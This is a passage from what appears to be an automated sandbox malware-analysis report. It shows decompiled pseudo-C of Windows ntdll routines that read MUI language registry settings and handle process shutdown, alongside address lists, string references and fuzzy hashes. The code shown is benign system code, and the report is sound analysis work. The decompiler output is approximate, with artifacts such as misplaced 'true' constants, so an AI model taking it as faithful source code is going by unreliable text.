				_v96 = 7;
				_v92 = 0;
				_v88 = 0;
				_v117 = 0;
				_t190 = 0;
				_v116 = 0;
				if(__ecx == 0 || _t170 == 0 || _a16 == 0) {
					_t194 = 0xc000000d;
					goto L23;
				} else {
					_t196 = _a4;
					 *_t170 = 0;
					if(_t196 == 1 || _t196 == 0) {
						E36B25050(0,  &_v84, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
						_v84 = 0x18;
						_v76 =  &_v92;
						_v80 = 0;
						_push( &_v84);
						_push(0x20019);
						_v72 = 0x40;
						_push( &_v112);
						_v68 = 0;
						_v64 = 0;
						if(E36B22AB0() >= 0) {
							_t124 = E36AD7220(_v104, _v100,  &_v116);
							_t190 = _v128;
							_t194 = _t124;
							if(_t194 != 0 || _t190 == 0) {
								_t181 = _v104;
								_t196 = _a4;
								goto L7;
							} else {
								goto L24;
							}
						} else {
							_t181 = 0;
							_v104 = 0;
							L7:
							if(_t196 == 1 && _t181 != 0) {
								_t187 =  &_v117;
								if(E36B9AD61(_t181,  &_v117) >= 0) {
									asm("sbb eax, eax");
									_a4 = _t196 &  ~(_v117 - 0x00000001 & 0x000000ff);
								}
							}
							_t194 = E36ADD736(0x2000000,  &_v108);
							if(_t194 < 0) {
								L51:
								 *_t170 = 1;
								goto L23;
							} else {
								if(_a4 != 1) {
									E36B25050(0x2000000,  &_v84, L"Control Panel\\Desktop\\MuiCached");
									_t194 = 0;
									_v32 = _v116;
									_v28 =  &_v92;
									_push( &_v36);
									_push(0x20019);
									_v36 = 0x18;
									_push( &_v120);
									_v24 = 0x40;
									_v20 = 0;
									 *((intOrPtr*)(_t200 + 0x88)) = 0;
									if(E36B22AB0() < 0) {
										 *_t170 = 1;
										L24:
										_t176 = 0;
										L25:
										_t112 = _a4;
										if(_a4 != 0 || _t190 != 0 &&  *((intOrPtr*)(_t190 + 4)) != _t176) {
											_t173 = _v100;
											L29:
											if(_t190 == 0) {
												_t190 = E36B03262(1, _t187 & 0xffffff00 | _t112 != 0x00000001, _t173);
												if(_t190 == 0) {
													_t194 = 0xc0000017;
												}
											}
											goto L31;
										} else {
											_t173 = _v100;
											_t116 = E36B9BD08(_v100, _t187, _t170,  &_v116);
											_t190 = _v124;
											_t194 = _t116;
											if(_t194 != 0) {
												L31:
												 *_a16 = _t190;
												L32:
												_t105 = _v88;
												if(_v88 == 0) {
													L43:
													_t171 = 0;
													goto L34;
												} else {
													_t171 = 0;
													E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t105);
													L34:
													if(_v112 != 0) {
														_push(_v112);
														E36B22A80();
														_v116 = _t171;
													}
													if(_v108 != 0) {
														_push(_v108);
														E36B22A80();
														_v112 = _t171;
													}
													if(_v104 != 0) {
														_push(_v104);
														E36B22A80();
													}
													goto L39;
												}
											}
											_t112 = _a4;
											goto L29;
										}
									}
									_t134 = L"MachinePreferredUILanguages";
									L15:
									E36B25050(0x2000000,  &_v84, _t134);
									_push(0x2000000);
									_t187 =  &_v92;
									_t184 = E36ADD64A(_v120,  &_v92,  &_v104, _t194,  &_v100);
									_t194 = 0xc0000034;
									if(_t184 == 0xc0000034) {
										L42:
										_t176 = 0;
										 *_t170 = 1;
										_t194 = 0;
										goto L25;
									}
									_t140 = _v96;
									if(_v96 == 0) {
										goto L42;
									}
									if(_t184 != 0x80000005) {
										goto L43;
									}
									_t192 = E36AF5D90(_t184,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _t140 + 2);
									_v104 = _t192;
									if(_t192 == 0) {
										_t194 = 0xc0000017;
										goto L43;
									}
									_push(_t184);
									_t187 =  &_v88;
									_t194 = E36ADD64A(_v116,  &_v88,  &_v100, _t192,  &_v96);
									if(_t194 < 0) {
										L22:
										_t190 = _v124;
										L23:
										if(_t194 != 0) {
											goto L32;
										}
										goto L24;
									}
									if(_v104 != 7) {
										if(_v104 == 1) {
											goto L21;
										}
										_t190 = _v124;
										_t176 = 0;
										_t194 = 0;
										 *_t170 = 1;
										goto L25;
									}
									L21:
									_t187 = _t192;
									_t194 = L36B04CA6(_v108, _t192, _v100 >> 1, "true", (0 | _a4 != 0x00000001) + 2, "true",  &_v124);
									goto L22;
								}
								_t155 = E36ADD8D0(0x2000000, _v108, _v100,  &_v116);
								_t190 = _v128;
								_t194 = _t155;
								if(_t194 == 0) {
									if(_t190 != 0) {
										goto L31;
									}
								}
								E36B25050(0x2000000,  &_v84, L"Control Panel\\Desktop");
								_v56 = _v116;
								 *((intOrPtr*)(_t200 + 0x58)) =  &_v92;
								 *((intOrPtr*)(_t200 + 0x60)) = 0;
								_v40 = 0;
								_push( &_v60);
								_push(0x20019);
								_v60 = 0x18;
								_push( &_v120);
								 *((intOrPtr*)(_t200 + 0x68)) = 0x40;
								_t194 = E36B22AB0();
								if(_t194 < 0) {
									goto L51;
								}
								_t134 = L"PreferredUILanguages";
								if(_a8 != 3) {
									_t134 = L"PreferredUILanguagesPending";
								}
								_t194 = 0;
								goto L15;
							}
						}
					} else {
						_t194 = 0xc000000d;
						L39:
						return _t194;
					}
				}
			}

0x36add2f4
0x36add2f8
0x36add2ff
0x36add303
0x36add307
0x36add30b
0x36add30f
0x36add317
0x36add31b
0x36add31f
0x36add325
0x36add327
0x36add32d
0x36b3a69c
0x00000000
0x36add344
0x36add344
0x36add347
0x36add34c
0x36add360
0x36add369
0x36add371
0x36add37b
0x36add37f
0x36add380
0x36add389
0x36add391
0x36add392
0x36add396
0x36add3a1
0x36b3a60d
0x36b3a612
0x36b3a616
0x36b3a61a
0x36b3a624
0x36b3a628
0x00000000
0x00000000
0x00000000
0x00000000
0x36add3a7
0x36add3a7
0x36add3a9
0x36add3ad
0x36add3b0
0x36b3a630
0x36b3a63b
0x36b3a64c
0x36b3a650
0x36b3a650
0x36b3a63b
0x36add3c9
0x36add3cd
0x36b3a658
0x36b3a658
0x00000000
0x36add3d3
0x36add3d7
0x36add5d5
0x36add5de
0x36add5e0
0x36add5e8
0x36add5f0
0x36add5f1
0x36add5fa
0x36add602
0x36add603
0x36add60e
0x36add615
0x36add623
0x36add642
0x36add52e
0x36add52e
0x36add530
0x36add530
0x36add535
0x36add549
0x36add54d
0x36add54f
0x36add560
0x36add564
0x36b3a6cd
0x36b3a6cd
0x36add564
0x00000000
0x36b3a6a6
0x36b3a6ac
0x36b3a6b2
0x36b3a6b7
0x36b3a6bb
0x36b3a6bf
0x36add56a
0x36add56d
0x36add56f
0x36add56f
0x36add575
0x36add63b
0x36add63b
0x00000000
0x36add57b
0x36add582
0x36add588
0x36add58d
0x36add592
0x36add594
0x36add598
0x36add59d
0x36add59d
0x36add5a6
0x36add5a8
0x36add5ac
0x36add5b1
0x36add5b1
0x36add5ba
0x36b3a6d7
0x36b3a6db
0x36b3a6db
0x00000000
0x36add5ba
0x36add575
0x36b3a6c5
0x00000000
0x36b3a6c5
0x36add535
0x36add625
0x36add465
0x36add46b
0x36add470
0x36add480
0x36add489
0x36add48b
0x36add492
0x36add62f
0x36add62f
0x36add631
0x36add634
0x00000000
0x36add634
0x36add498
0x36add49e
0x00000000
0x00000000
0x36add4aa
0x00000000
0x00000000
0x36add4c4
0x36add4c6
0x36add4cc
0x36b3a677
0x00000000
0x36b3a677
0x36add4d2
0x36add4e2
0x36add4eb
0x36add4ef
0x36add526
0x36add526
0x36add52a
0x36add52c
0x00000000
0x00000000
0x00000000
0x36add52c
0x36add4f6
0x36b3a686
0x00000000
0x00000000
0x36b3a68c
0x36b3a690
0x36b3a692
0x36b3a694
0x00000000
0x36b3a694
0x36add4fc
0x36add507
0x36add524
0x00000000
0x36add524
0x36add3ea
0x36add3ef
0x36add3f3
0x36add3f7
0x36b3a662
0x00000000
0x00000000
0x36b3a668
0x36add407
0x36add410
0x36add418
0x36add41e
0x36add422
0x36add42a
0x36add42b
0x36add434
0x36add43c
0x36add43d
0x36add44a
0x36add44e
0x00000000
0x00000000
0x36add458
0x36add45d
0x36b3a66d
0x36b3a66d
0x36add463
0x00000000
0x36add463
0x36add3cd
0x36b3a5f6
0x36b3a5f6
0x36add5c0
0x36add5c8
0x36add5c8
0x36add34c

Strings

@, xrefs: 36ADD43D
@, xrefs: 36ADD389
MachinePreferredUILanguages, xrefs: 36ADD625
PreferredUILanguagesPending, xrefs: 36B3A66D
Control Panel\Desktop, xrefs: 36ADD3FD
Control Panel\Desktop\MuiCached, xrefs: 36ADD5CB
@, xrefs: 36ADD603
PreferredUILanguages, xrefs: 36ADD458, 36ADD465
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 36ADD356

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 5e91f80b0e7086e8743f1aedd14f2d90310b08903b051332a29689bf837b39e6
Instruction ID: b4b042e812e04f4c8d3c0f868e693aa27f4fa73a040dd80c0310f7cb134446d0
Opcode Fuzzy Hash: 5e91f80b0e7086e8743f1aedd14f2d90310b08903b051332a29689bf837b39e6
Instruction Fuzzy Hash: B1B168B6919355DFD711DF28C890A5FBBE8EB88748F51492EF88897200DB70D908CB92

Uniqueness

Uniqueness Score: -1.00%

Function 36B0D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E36B0D6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push("true");
				_push(0x36bbc5e8);
				_t68 = E36B37BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x36bd5da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x36bd37c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E36B5E692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x36bd5dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x36bd5da8 = 1;
				if( *0x36bd65f0 != 0) {
					_t137 =  *0x36bd91f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x36bd91e0("true");
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push("true");
					E36AE4779(_t74, _t118);
				}
				if(( *0x36bd391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x36bd9234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x36bd9234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x36bd68c8;
					if( *0x36bd68c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							E36B60FC8();
							 *0x36bd68c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						E36B0D8F0();
					}
					_t68 = E36B0D898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x36bd5da0; // 0x68d0c58
				L8:
				if(_t129 != 0x36bd5d9c) {
					_t18 = _t129 - 0x10; // 0x68d0c48
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x68d0a48
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x761d5cd0
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						E36AFDC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E36AFF0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
						E36AFDCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						E36B0D886();
					}
					goto L8;
				}
				_t119 =  *0x36bd5b24; // 0x68b2ce0
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					E36AFDC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x36bd5b24; // 0x68b2ce0
					E36AFF0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					E36B0D88F();
				}
				goto L15;
			}

0x36b0d6d0
0x36b0d6d2
0x36b0d6d7
0x36b0d6dc
0x36b0d6e3
0x36b0d6ed
0x36b0d810
0x36b0d813
0x36b0d81f
0x36b0d81f
0x36b0d6f3
0x36b0d6f9
0x36b0d6fc
0x36b0d6ff
0x36b0d702
0x36b0d709
0x36b4f0c2
0x36b4f0c2
0x36b0d716
0x36b4f0cd
0x36b4f0e7
0x36b4f0ec
0x36b4f0ec
0x36b0d71c
0x36b0d71f
0x36b0d724
0x36b0d732
0x36b0d86d
0x36b0d873
0x36b0d875
0x36b0d877
0x36b0d879
0x36b0d87f
0x36b0d87f
0x36b0d738
0x36b0d740
0x36b0d742
0x36b0d744
0x36b0d744
0x36b0d750
0x36b4f0f4
0x36b4f0f7
0x36b4f0fe
0x36b4f101
0x36b4f108
0x36b4f10b
0x36b4f10d
0x00000000
0x00000000
0x36b4f113
0x36b4f117
0x36b0d7ed
0x36b0d7ed
0x36b0d7f3
0x36b0d7fa
0x36b4f13c
0x36b4f13f
0x36b4f145
0x36b4f14a
0x36b4f14a
0x36b4f13f
0x36b0d800
0x36b0d804
0x36b0d806
0x36b0d806
0x36b0d80b
0x00000000
0x36b0d80b
0x36b0d756
0x36b0d756
0x36b0d75a
0x36b0d75d
0x36b0d766
0x36b0d76c
0x36b0d76e
0x36b0d76e
0x36b0d771
0x36b0d774
0x36b0d774
0x36b0d777
0x36b0d77a
0x36b0d77a
0x36b0d77d
0x36b0d782
0x36b0d78d
0x36b0d794
0x36b0d799
0x36b0d79f
0x36b0d79f
0x36b0d7a1
0x36b0d7a7
0x36b0d7ac
0x36b0d7af
0x36b0d7b2
0x36b0d7b6
0x36b0d7da
0x36b0d7da
0x36b0d7b8
0x36b0d7b9
0x36b0d7c0
0x36b0d7c5
0x36b0d7cc
0x36b0d7cf
0x36b0d7cf
0x00000000
0x36b0d782
0x36b0d7e1
0x36b0d7e7
0x36b0d7eb
0x36b0d820
0x36b0d827
0x36b0d82c
0x36b0d832
0x36b0d834
0x36b0d83a
0x36b0d83f
0x36b0d842
0x36b0d84a
0x36b0d84f
0x36b0d856
0x36b0d856
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 36B0D879

Part of subcall function 36AE4779: RtlDebugPrintTimes.NTDLL ref: 36AE4817

Strings

LdrShutdownProcess, xrefs: 36B4F0D8
$, xrefs: 36B0D78D
Process 0x%p (%wZ) exiting, xrefs: 36B4F0D1
$, xrefs: 36B0D820
minkernel\ntdll\ldrinit.c, xrefs: 36B4F0E2

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: 6db9f0981520eda32c106ce50057105ce0fd5bc59d2bfb92fd96b39150403c7d
Instruction ID: fe48f6dc106dc30e634b14fe384ac4b75d7f6d395000ffeebb76f0f2e2ae4bf7
Opcode Fuzzy Hash: 6db9f0981520eda32c106ce50057105ce0fd5bc59d2bfb92fd96b39150403c7d
Instruction Fuzzy Hash: EA51DC76E043559FEB04DFA4C954B9DBFB2FF44348F205059D900AB281EB79A882CF91

Uniqueness

Uniqueness Score: -1.00%

Function 36ADD02D Relevance: 10.2, Strings: 8, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E36ADD02D(void* __ecx, intOrPtr* __edx, intOrPtr _a4) {
				char* _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char* _v124;
				signed int _v128;
				char _v132;
				char _v140;
				signed int _v144;
				char _v145;
				char _v148;
				signed int _v152;
				void* _v156;
				void* _v157;
				signed int _v160;
				void* _v161;
				signed int _v164;
				signed int _v168;
				void* _v172;
				void* _v180;
				void* _v188;
				intOrPtr _t111;
				void* _t128;
				void* _t160;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr* _t179;
				void* _t182;
				char _t184;
				signed int _t185;
				void* _t187;
				void* _t196;

				_t187 = (_t185 & 0xfffffff8) - 0x9c;
				_t160 = __ecx;
				_t179 = __edx;
				_v128 = 0;
				_v160 = 0;
				_v144 = 0;
				_v152 = 0;
				if(__edx == 0 || _a4 == 0) {
					_t182 = 0xc000000d;
					goto L11;
				} else {
					_v128 =  *__edx;
					E36B25050(__ecx,  &_v140, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
					_push("true");
					_pop(_t184);
					_v132 = _t184;
					_v124 =  &_v148;
					_v128 = 0;
					_push( &_v132);
					_push(0x20019);
					_v120 = 0x40;
					_push( &_v168);
					_v116 = 0;
					_v112 = 0;
					if(E36B22AB0() >= 0) {
						_t182 = E36B9ADD6(_v160, _a4,  &_v145,  &_v132);
						if(_t182 >= 0) {
							L11:
							if(_v160 != 0) {
								_push(_v160);
								E36B22A80();
							}
							if(_v144 != 0) {
								_push(_v144);
								E36B22A80();
							}
							if(_v152 != 0) {
								_push(_v152);
								E36B22A80();
							}
							if(_t182 < 0) {
								if(_t179 == 0) {
									goto L19;
								}
								_t162 = _v128;
								if( *_t179 == _t162) {
									goto L19;
								}
								if( *_t179 != 0) {
									E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t179);
								}
								goto L44;
							} else {
								if( *_t179 != 0) {
									L19:
									return _t182;
								}
								_t111 = E36ADDAA8(1);
								 *_t179 = _t111;
								if(_t111 == 0) {
									_t162 = _v128;
									_t182 = 0xc0000017;
									L44:
									 *_t179 = _t162;
								}
								goto L19;
							}
						}
						if(_t160 == 8) {
							 *((char*)(_t187 + 0x13)) = 0;
							if(E36B9AD61(_v160, _t187 + 0x13) == 0 &&  *((char*)(_t187 + 0x13)) == 1) {
								_push("true");
								_pop(_t160);
							}
						}
						_push(_v160);
						E36B22A80();
						_v164 = _v164 & 0x00000000;
						_push("true");
						_pop(_t184);
					}
					_t170 = 0x2000000;
					if(E36ADD736(0x2000000,  &_v152) < 0) {
						_v152 = _v152 & 0x00000000;
					}
					if(_t160 != 8) {
						if(_t160 != 4) {
							goto L25;
						}
						if(_v152 == 0) {
							_t128 = 0xc0000034;
						} else {
							E36B25050(_t170,  &_v140, L"Control Panel\\Desktop\\MuiCached\\MachineLanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v44 = _v44 & 0x00000000;
							_v40 = _v40 & 0x00000000;
							_v56 = _v160;
							_v52 =  &_v148;
							_push( &_v60);
							_push(0x20019);
							_v60 = _t184;
							_push( &_v168);
							_v48 = 0x40;
							_t128 = E36B22AB0();
						}
						if(_t128 < 0) {
							E36B25050(_t170,  &_v140, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings\\LanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v32 = _v32 & 0x00000000;
							 *(_t187 + 0xa0) =  *(_t187 + 0xa0) & 0x00000000;
							 *(_t187 + 0xa4) =  *(_t187 + 0xa4) & 0x00000000;
							_v28 =  &_v148;
							_push( &_v36);
							_push(0x20019);
							_v36 = _t184;
							_push( &_v168);
							 *((intOrPtr*)(_t187 + 0xa8)) = 0x40;
							_t182 = E36B22AB0();
							if(_t182 < 0) {
								goto L9;
							}
						}
						goto L25;
					} else {
						if(_v152 == 0) {
							L10:
							_t182 = 0;
							goto L11;
						}
						E36B25050(_t170,  &_v140, L"Software\\Policies\\Microsoft\\Control Panel\\Desktop");
						_v92 = _v92 & 0x00000000;
						_v88 = _v88 & 0x00000000;
						_v104 = _v160;
						_push("true");
						_pop(_t164);
						_v100 =  &_v148;
						_push( &_v108);
						_push(0x20019);
						_v108 = _t184;
						_push( &_v152);
						_v96 = _t164;
						if(E36B22AB0() >= 0) {
							_t170 = _v144;
							_t182 = E36B9ADD6(_v144, _a4,  &_v145,  &_v132);
							if(_t182 >= 0) {
								goto L11;
							}
							_push("true");
							_pop(_t184);
						}
						E36B25050(_t170,  &_v140, L"Control Panel\\Desktop\\LanguageConfiguration");
						_v168 = _v168 & 0x00000000;
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						 *((intOrPtr*)(_t187 + 0x64)) = _v160;
						 *((intOrPtr*)(_t187 + 0x68)) =  &_v148;
						_push( &_v84);
						_push(0x20019);
						_v84 = _t184;
						_push( &_v168);
						_v72 = _t164;
						_t182 = E36B22AB0();
						if(_t182 >= 0) {
							L25:
							_t182 = E36ADD9A2(_v160, _t179, _a4);
							goto L11;
						} else {
							_t196 = _t182 - 0xc0000034;
							L9:
							if(_t196 != 0) {
								goto L11;
							}
							goto L10;
						}
					}
				}
			}

0x36add035
0x36add03f
0x36add042
0x36add044
0x36add048
0x36add04c
0x36add050
0x36add056
0x36b3a5a1
0x00000000
0x36add065
0x36add067
0x36add075
0x36add07a
0x36add07c
0x36add081
0x36add085
0x36add08f
0x36add093
0x36add094
0x36add09d
0x36add0a5
0x36add0a6
0x36add0aa
0x36add0b5
0x36b3a52a
0x36b3a52e
0x36add194
0x36add199
0x36add19b
0x36add19f
0x36add19f
0x36add1a9
0x36b3a5ab
0x36b3a5af
0x36b3a5af
0x36add1b4
0x36add1b6
0x36add1ba
0x36add1ba
0x36add1c1
0x36b3a5bb
0x00000000
0x00000000
0x36b3a5c1
0x36b3a5c7
0x00000000
0x00000000
0x36b3a5d0
0x36b3a5df
0x36b3a5df
0x00000000
0x36add1c7
0x36add1ca
0x36add1de
0x36add1e6
0x36add1e6
0x36add1cf
0x36add1d4
0x36add1d8
0x36b3a5e6
0x36b3a5ea
0x36b3a5ef
0x36b3a5ef
0x36b3a5ef
0x00000000
0x36add1d8
0x36add1c1
0x36b3a537
0x36b3a541
0x36b3a54d
0x36b3a556
0x36b3a558
0x36b3a558
0x36b3a54d
0x36b3a559
0x36b3a55d
0x36b3a562
0x36b3a567
0x36b3a569
0x36b3a569
0x36add0bf
0x36add0cc
0x36b3a56f
0x36b3a56f
0x36add0d5
0x36add1ec
0x00000000
0x00000000
0x36add1fc
0x36add2de
0x36add202
0x36add20c
0x36add215
0x36add21a
0x36add222
0x36add22a
0x36add232
0x36add23d
0x36add23e
0x36add247
0x36add24e
0x36add24f
0x36add25a
0x36add25a
0x36add261
0x36add26d
0x36add272
0x36add27b
0x36add283
0x36add28b
0x36add293
0x36add2a1
0x36add2a2
0x36add2ab
0x36add2b2
0x36add2b3
0x36add2c3
0x36add2c7
0x00000000
0x36add2e5
0x36add2c7
0x00000000
0x36add0db
0x36add0e0
0x36add192
0x36add192
0x00000000
0x36add192
0x36add0f0
0x36add0f9
0x36add0fe
0x36add103
0x36add10b
0x36add10d
0x36add10e
0x36add116
0x36add117
0x36add120
0x36add124
0x36add125
0x36add130
0x36b3a580
0x36b3a58f
0x36b3a593
0x00000000
0x00000000
0x36b3a599
0x36b3a59b
0x36b3a59b
0x36add140
0x36add149
0x36add14e
0x36add153
0x36add158
0x36add160
0x36add168
0x36add169
0x36add172
0x36add176
0x36add177
0x36add180
0x36add184
0x36add2c9
0x36add2d7
0x00000000
0x36add18a
0x36add18a
0x36add190
0x36add190
0x00000000
0x00000000
0x00000000
0x36add190
0x36add184
0x36add0d5

Strings

Control Panel\Desktop\LanguageConfiguration, xrefs: 36ADD136
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 36ADD202
@, xrefs: 36ADD2B3
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 36ADD263
@, xrefs: 36ADD09D
@, xrefs: 36ADD24F
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 36ADD0E6
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 36ADD06F

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: d1059167cbb6d656a7a3bcbdc5d2895b9838321d34aa9690d751bafc0567b580
Instruction ID: b994c5add99abeef4538d3f798adb63e54e8de0890dc8352f1a6a3fc5860fb20
Opcode Fuzzy Hash: d1059167cbb6d656a7a3bcbdc5d2895b9838321d34aa9690d751bafc0567b580
Instruction Fuzzy Hash: 0DA135B1908315DFE321DF25C850B9BB7E8BB84759F11492EFA9896240D774D908CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 36B68633 Relevance: 9.0, Strings: 7, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E36B68633(char __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v29;
				signed int _v30;
				char _v31;
				intOrPtr _v32;
				signed int _v48;
				void* __ebx;
				void* __edi;
